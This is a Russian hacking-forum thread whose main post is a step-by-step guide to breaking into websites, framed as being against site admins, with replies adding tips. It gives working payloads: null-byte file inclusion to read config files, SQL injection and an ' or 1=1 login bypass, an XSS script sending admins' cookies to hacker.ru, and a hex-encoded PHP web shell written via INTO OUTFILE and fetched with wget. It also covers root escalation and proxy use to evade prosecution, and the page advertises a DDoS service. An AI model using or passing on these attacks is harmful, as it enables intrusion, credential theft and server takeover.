Последовательность взлома сайта. - Proxy-Base Community - Анонимность и безопасность в интернете.
Бесплатные прокси. Количество:
Прокси для пользователей форума (API). Количество:
Купить доступ к прокси-листам (API). Количество:
 



Информация по хайдам / репутации

(РЕКОМЕНДУЮ) №1 >>>DDos Атака<<|>>DDoS Service<<< ДДОС СЕРВИС<<|>>Заказать DDOS
Бесплатные прокси уже в Telegram
Все инфопродукты и приватная информация бесплатно
Старый 04.08.2009, 15:27   #1 (permalink)
VPN
 
Аватар для 2FED
 
Регистрация: 11.05.2009
Адрес: Сибирь
Сообщений: 458
Member ID: 4
ICQ 310234

Репутация: 855
Репутация: 855
Сказал(а) спасибо: 599
Поблагодарили 516 раз(а) в 199 сообщениях
Топикстартер (автор темы) По умолчанию Последовательность взлома сайта.

ВСТУПЛЕНИЕ
Данная статья не претендует на звание самой лучшей, т.к. существует множество статей на данную тему. Она призвана собрать в себе некоторые из массы приемов по борьбе против админов.

Часть 1. ПРЕДВАРИТЕЛЬНОЕ ОБСЛЕДОВАНИЕ «ПАЦИЕНТА».

Глава 1. Статичность или динамичность?
Допустим у нас есть сайт _www.xxx.com. Первое, что необходимо сделать – это просмотреть его контент.
Бывают сайты двух типов – со статическим или же с динамическим наполнением. Второй тип встречается чаще, т.к. каждый раз создавать новую страницу – это большой труд, а если таких страниц нужно 100… Первый тип используется либо новичками(для создания личной странички) или сильно защищаемыми компаниями, дабы обезопасить себя от большинства приемов взлома, но, как говорится, никто не застрахован… Второй тип для нас предпочтительнее, т.к. из-за динамичности трудно отслеживать все появляющиеся ошибки.
Итак, смотрим какие страницы присутствуют. Для статического контента свойственны страницы с расширениями
*.htm, *.html (Но это не всегда так, т.к. можно прятать сценарии на PHP или ASP в виде HTML). Распознать статические страницы можно по их количеству, отсутствию параметров в адресной строке и прямым переходам на другие страницы. Для динамических сайтов характерны расширения *.php, *.phtml, *.php3, *.asp, *.aspx, *.jsp [COLOR="MediumTurquoise"]- это расширения языков обработки сценариев.
Пример: На сайте http://www.xxx.com присутствуют 5 страниц: index.html, masha.html, pasha.html, ih_lubov.html, about.htm. Этот сайт скорее всего статический… А вот страница вида _http://www.yyy.com/index.html?page=sasha.html наводит на подозрение о динамичности сайта.

Глава 2. Кто тут ещё?
Возможно, что обследуемый сайт состоит всего из 3-4 статических страниц и найти ошибки в них нет возможности. В этом случае нам может помочь то обстоятельство, что на одном сервере могут размещаться несколько сайтов, некоторые из них могут иметь динамическое наполнение или открытый доступ в админки(что бывает очень редко). Помочь найти таких соседей на помогут специальные сервисы, вот адреса трёх из таких:
http://2ip.ru/domain-list-by-ip/
http://madnet.name/tools/madss/
www.seologs.com/ip-domains.html
Далее можно проверить сервер на наличие других сервисов, таких как FTP, Telnet, SSH, HTTPS(защищенный HTTP). Иногда бывает так, что админ полностью защитил свой контент, а забыл про сервис FTP и оставил его открытым.
Пример: Сайт _http://www.xxx.com хорошо защищен, но на этом IP сидит ещё один сайт _http://www.yyy.com (как мы узнали из вышеупомянутых сервисов). Он защищен тоже хорошо, но набив в адресной строке _ftp://www.yyy.com мы видим весь контент сайта и можем залить туда шелл (специальный скрипт позволяющий выполнять в системе сервера различные команды). Вообще, заливка шелла – это предпоследний шаг при получении полного доступа к серверу.

Глава 3. Ближе к телу.
Итак, зная многое о сайте, что можно ещё сделать? Можно просканировать «скрытый» контент сайта для получения нужной информации. Многие админы хотят, чтобы их детище было популярным у людей, поэтому они всячески пытаются завлечь к себе поисковые системы. Это делается для того, чтобы человек в поисках информации заходил на сайт через поисковые серверы (yandex.ru, rambler.ru, google.com, msn.com). У этих систем есть свои «добыватели информации» - роботы, которые ходят по всем ссылкам и все куда-то записывают, а потом выдают при нажатии на кнопку ПОИСК. Чтобы эти роботы не лазили куда им не следует, часто создают в корне сайта специальный файл с инструкциями боту. Он называется robots.txt. В нём иногда можно найти много интересной информации.
Также можно просканировать весь сайт при помощи специальных утилит таких как NIKTO, Xspyder и др. (Все их можно найти в интернете). Они помогут отыскать скрытые от наших глаз файлы и папки.

Пример: По адресу _http://www.xxx.com/robots.txt мы видим, что существует папка /forum, хотя на самом сайте о ней никакого упоминания нет. Переходим по адресу _http://www.xxx.com/forum и лицезреем только что сделанный форум, а просканировав сайт сканером, мы находим админку без авторизации - _http://www.xxx.com/admin.


Часть 2. АТАКА.

Глава 1. Перед атакой.
При просмотре сайта опытный глаз всегда заметит, самодельный сайт или же он построен на каком-либо популярном движке. А для этих движков почти все уязвимости известны (за исключение так называемых private-sploit, которые известны только узкому кругу людей и стоят больших денег). Новичку же стоит обращать своё внимание на следующие вещи:
- Надпись Powered by xxxxxxxx говорит, что название движка xxxxxxxx;
- Стиль оформеления такой же, как у движка yyyyyyy;
- Название скриптов такое же, как у движка zzzzzzz.
Если вы поняли, какой движок управляет сайтом, то нужно поискать уязвимости самому, скачав такой же, или же, если не хватает знаний, то воспользоваться специализированными сайтами, такими как XakNet.ru, AntiChat.ru, SecurityLab.ru, milw0rm.com. Там в специальных разделах лежит информация почти о всех уязвимостях известных движков, а также присутствуют сплоиты – специальные скрипты, автоматически взламывающие сайт (их обычно искользуют либо новички за не знанием, либо профи для упрощения процесса взлома).
Для самописных сайтов существуют несколько видов атак на веб-контент, самые распространённые:

- PHP-инъекции;
- SQL-инъекции;
- XSS-атаки.


Глава 2. PHP-injection.
PHP-инъекции – это вид атаки, при котором вместо положенной страницы взломщик выводит ту, которая ему нужна. Наличие данной уязвимости характерно для сайтов, у которых адресная строка выглядит примерно так_http://www.xxx.com/index.php?page=sasha.php - это идеальная PHP-инъеция, при которой скрипт не проверяет(в большинстве случаев) ни название файла, ни его расширение. Есть инъекции, при которых расширение файла дописывается самим скриптом - _http://www.xxx.com/index.php?page=sasha - выведет страницу sasha.html. Для обхода данного «запрета» (А нам нужно вывести например файл с паролями от базы данных – config.php) используется 0-баг, суть которого состоит в том, что в конце полного названия файла ещё приписывается %00, т.е. адрес примет вид _http://www.xxx.com/index.php?page=config.php%00 (%00 означает «конец строки»). Таким образом на экране(или в коде страницы) выведется содержимое файла config.php, а там…..

Глава 3. SQL-injection.
Многие сайты хранят важную информацию в базах данных. Наиболее популярными в интернете считаются MySQL и MSSQL базы данных. Сайт при помощи запросов может обратиться к базе данных, она выдаст ответ, а скрипт выдаст его в нужном формате пользователю. Так вот, если изменить каким-то образом запрос, мы можем получить нужный нам результат.
Проверить на наличие SQL-инъекции можно подставив в параметр символ «‘», который в базах данных является ограничителем запроса, т.е. если есть адрес
_http://www.xxx.com/index.php?id=365 и мы подставив ‘ после параметра 365 - _http://www.xxx.com/index.php?id=365’ получаем вместо вывода на экран информации ошибку, то это говорит о наличии SQL-инъекции. Дальше – все зависит от вида и версии базы данных. Описываеть здесь все подвиды SQL-атак я не буду, т.к. объём статьи сразу увеличится в разы, но с радостью скажу где про это можно почитать подробно, т.к. статей по данному виду уязвимостей - множество. Вот ссылки на специализированные сайты:
http://XakNet.ru
http://AntiChat.ru
http://Web-Hack.ru и др.

Пример: Адресная строка сайта выглядит так: _http://www.xxx.com/index.php?id=365. Мы, подставив ‘ - _http://www.xxx.com/index.php?id=365’ - получаем ошибку видаMySQL Error: …”. Подбираем количество столбцов при помощи+order+by+XX/*, где XX – число, которое означает номер столбца:
_http://www.xxx.com/index.php?id=365+order+by+50/* - ошибка есть…
_http://www.xxx.com/index.php?id=365+order+by+25/* - ошибка есть…
_http://www.xxx.com/index.php?id=365+order+by+15/* - ошибки нет, значит кол-во столбцов между 15 и 25… Далее, тем же путем находим, что количество столбцов равно 16.
_http://www.xxx.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16/* - выводятся 2,4,6,8,15. Подставляем user(), version(), database() на место выводимых чисел и получаем информацию о пользователе, версии и название используемой базы данных. Дальше зависит от данных, которые мы хотим получить…
Также, если при входе в закрытые разделы сайта используется база данных, мы можем обойти авторизацию при помощи конструкции вида:
’ or 1=1/*, подставив её вместо логина, пароля.

Глава 4. XSS-атака.
Этот вид атаки используется для получения Coockies админов. Если при вводе в какое-нибудь поле, например «ПОЛНОЕ ИМЯ» в гостевой книге, конструкции вида
Код:
<script>ALERT(‘Admin – FUCK’)(</script> 
и последующем просмотре своей записи на экране появляется окно с надписью «Admin – FUCK», то это говорит о наличии XSS-уязвимости. Если вставить специальный код, то при просмотре админом данного сообщения его куки прилетят к вам на сниффер, а в них пароль или его хэш, или сеcсия…
Пример: Сайт _http://www.xxx.com имеет гостевую книгу, в которой поле имя подвержено XSS-атаке: вставляем в это поле
Код:
<script>ALERT(‘Admin – FUCK’);</script> 
и лицезреем на экране
Код:
«Admin – FUCK» 
. Теперь вставляем
Код:
«<script>img = new Image(); img.src=http://hacker.ru/snf.jpg?"+document.cookie;</script>» 
и ждем когда админ просмотрит вашу писятину… Получаем через некоторое время на сниффер MD5-хэш его пароля. Расшифровываем на http://MD5.XakNet.ru, http://HashCracking.info, http://MD5.xek.cc. Дальше – в админку…

Часть 3. ШЕЛЛ, РУТ.

Глава 1. Шелл-шелл-ля-фам.
Итак, мы в админке, или имеем root-доступ к базе данных, или PHP-inj удаленного файла, или FTP-доступ к сайту, что дальше. А дальше еще проще:
1) FTP-доступ или АДМИНКА. Просто заливаем понравившийся вам скрипт шелла и к следующей главе.
2) PHP-inj. Заливаем скрипт шелла на какой-нибудь бесплатный хостинг, например,
narod.ru, и инклудим его примерно так - _http://www.xxx.com/index.php?page=http://vasiliy.narod.ru/shell.php, потом заливаем шелл прямо на сайт.
3) Root MySQL – если не фильтруется кавычка, то можно залить шелл при помощи запроса _http://www.xxx.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8, 0x3C3F2073797374656D28245F4745545B2763275D293B203F 3E,10,11,12,13,14,15,16+FROM+mysql.user+INTO+OUTFI LE+'/home/www/shell.php'/*, где 0x3C3F2073797374656D28245F4745545B2763275D293B203F 3E – это закодированное выражение <? system($_GET['c']); ?>, позволяющее выполнять команды на сервере. Далее заливаем более удобный для работы шелл командой _http://www.xxx.com?c=wget -O shell.php _http://vasiliy.narod.ru/shell.php.

Глава 2. Руууут.
Залив шелл мы теперь можем выполнять команды на сервере, а первой командой будет id, которая показывает ваши права в системе, а они обычно скромные. Хочется большего, тогда смотрим, что за ОС стоит на сервере(команда uname –a). Под эту версию ищем сплойт на сайте [Для просмотра данной ссылки нужно зарегистрироваться], компилируем, запускаем(как это делать описано либо в начале самого сплойта, либо в статьях) и… руууууут! Цель достигнута.

Часть 4. ОБЕЗОПАСИЛИСЬ ЛИ?
Каждое преступление наказуемо, поэтому надо заранее себя обезопасить – проксики должны стать вашими лучшими друзьями… Почитайте про ЭТО, не поленитесь…
Видео по статье
Автор статьи -=Saint=-
Взято с xaknet.ru
2FED вне форума   Ответить с цитированием
14 пользователя(ей) сказали cпасибо:
Старый 11.05.2010, 14:42   #2 (permalink)
HTTP
 
Регистрация: 04.05.2010
Сообщений: 19
Member ID: 7702
ICQ 581111717

Репутация: 6
Репутация: 6
Сказал(а) спасибо: 5
Поблагодарили 4 раз(а) в 4 сообщениях
По умолчанию Re: Последовательность взлома сайта.

а если нет инклуда, а весь код расположен в index.php?
artursn вне форума   Ответить с цитированием
Старый 13.05.2010, 16:11   #3 (permalink)
HTTP/S
 
Регистрация: 13.02.2010
Сообщений: 61
Member ID: 6564

Репутация: 44
Репутация: 44
Сказал(а) спасибо: 29
Поблагодарили 32 раз(а) в 21 сообщениях
По умолчанию Re: Последовательность взлома сайта.

sql inj - load_file
вытаскивание паролей через sql inj и поиск админки (сканирование на известные файлы и папки админок) - в ней возможности залить шел обычно присутствуют
а вообще вариантов море, статья лишь примерный ориентир
DrakonHaSh вне форума   Ответить с цитированием
Старый 13.05.2010, 16:40   #4 (permalink)
HTTP
 
Аватар для bussi
 
Регистрация: 24.04.2010
Сообщений: 20
Member ID: 7533
ICQ 764834

Репутация: 54
Репутация: 54
Сказал(а) спасибо: 76
Поблагодарили 52 раз(а) в 33 сообщениях
По умолчанию Re: Последовательность взлома сайта.

1. 3) Root MySQL http://www.xxx.com?c=wget -O shell.php _http://vasiliy.narod.ru/shell.php, прежде чем это делать, необходимо найти директорию доступную для записи, чаще всего это /tmp. Что бы найти директорию выполняем команду ls -l и смотрим на права (с=ls -l)

2.Глава 4. XSS-атака.Получаем через некоторое время на сниффер MD5-хэш его пароля. Расшифровываем на http://MD5.XakNet.ru, http://HashCracking.info, http://MD5.xek.cc. Дальше – в админку… Это крайне редкий случай. Хэши как правило соленые и расшифровке не подлежат, поэтому в этом случае наиболее удобно подменять куки на куки жертвы.

А статья для новичков в самый раз
bussi вне форума   Ответить с цитированием
Пользователь сказал cпасибо:
Старый 25.03.2011, 22:44   #5 (permalink)
HTTP
 
Регистрация: 25.03.2011
Сообщений: 6
Member ID: 12646

Репутация: 0
Репутация: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
По умолчанию Re: Последовательность взлома сайта.

крутоооо
forktamer вне форума   Ответить с цитированием
Старый 16.11.2011, 01:24   #6 (permalink)
HTTP
 
Регистрация: 16.11.2011
Сообщений: 1
Member ID: 21166

Репутация: 0
Репутация: 0
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
По умолчанию Re: Последовательность взлома сайта.

пусть люди сначала научатся ФЕЙКИ создавать... а потом уже на взломы переходят... так проще будет )))
mctosha вне форума   Ответить с цитированием
Старый 14.01.2013, 19:54   #7 (permalink)
VPN
 
Регистрация: 28.04.2010
Сообщений: 546
Member ID: 7588

Репутация: 1189
Репутация: 1189
Сказал(а) спасибо: 826
Поблагодарили 443 раз(а) в 229 сообщениях
По умолчанию Re: Последовательность взлома сайта.

Я например не хочу ломать, но вот для поиска уязвимостей в своих сайтах то что нужно статейка
haos вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Trackbacks are Вкл.
Pingbacks are Вкл.
Refbacks are Вкл.


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Чат для сайта NekitoSP Флейм 44 04.06.2010 06:53




DDoS Protected




Мы в твиттере, Proxy-Base.Org Twitter

Proxy-Base Community - Анонимность и безопасность в интернете.
Наши партнеры: CRC Labs, SEO-Crack.Com, Garsuk.Com, SED Team, Skladchik.com, BSS Family

Powered by vBulletin® | Булка сделана в пекарне®
Copyright © 2000 - , Jelsoft Enterprises Ltd. Перевод: zCarot
Вся информация на сайте выложена исключительно в ознакомительных целях.